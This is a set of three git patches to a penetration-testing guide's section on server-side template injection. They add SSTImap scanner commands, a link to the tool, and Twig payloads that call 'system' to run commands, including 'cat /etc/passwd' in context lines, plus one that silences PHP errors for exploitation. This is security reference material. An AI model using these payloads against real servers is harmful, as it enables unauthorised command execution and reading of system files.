From e4f58422e029c0d09c2da7f1716bb0d6a2022143 Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin <vladko312@gmail.com>
Date: Sun, 7 Jan 2024 09:40:59 +0300
Subject: [PATCH 1/3] Update README.md

---
 .../ssti-server-side-template-injection/README.md         | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index b7847528e..963b9a97e 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
 ```
 
+### [SSTImap](https://github.com/vladko312/sstimap)
+
+```bash
+python3 sstimap.py -i -l 5
+python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
+python3 sstimap.py -u 'https://example.com/page?name=John' -s
+```
+
 ### [Tplmap](https://github.com/epinna/tplmap)
 
 ```python

From e06db461f7222e9e03a203936b555a90807c8ce5 Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin <vladko312@gmail.com>
Date: Sun, 7 Jan 2024 22:34:43 +0300
Subject: [PATCH 2/3] Update README.md

---
 pentesting-web/ssti-server-side-template-injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index b7847528e..598409af4 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1037,6 +1037,8 @@ If you think it could be useful, read:
 
 {% embed url="https://github.com/Hackmanit/TInjA" %}
 
+{% embed url="https://github.com/vladko312/sstimap" %}
+
 {% embed url="https://github.com/epinna/tplmap" %}
 
 {% embed url="https://github.com/Hackmanit/template-injection-table" %}

From ab550dc1158089bd04345aece2c80b39d343335f Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin <vladko312@gmail.com>
Date: Sun, 7 Jan 2024 22:40:00 +0300
Subject: [PATCH 3/3] Update README.md

---
 pentesting-web/ssti-server-side-template-injection/README.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 598409af4..59196cb6b 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -538,6 +538,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id',""]|sort('system')}}
+
+#Hide warnings and errors for automatic exploitation
+{{["error_reporting", "0"]|sort("ini_set")}}
 ```
 
 **Twig - Template format**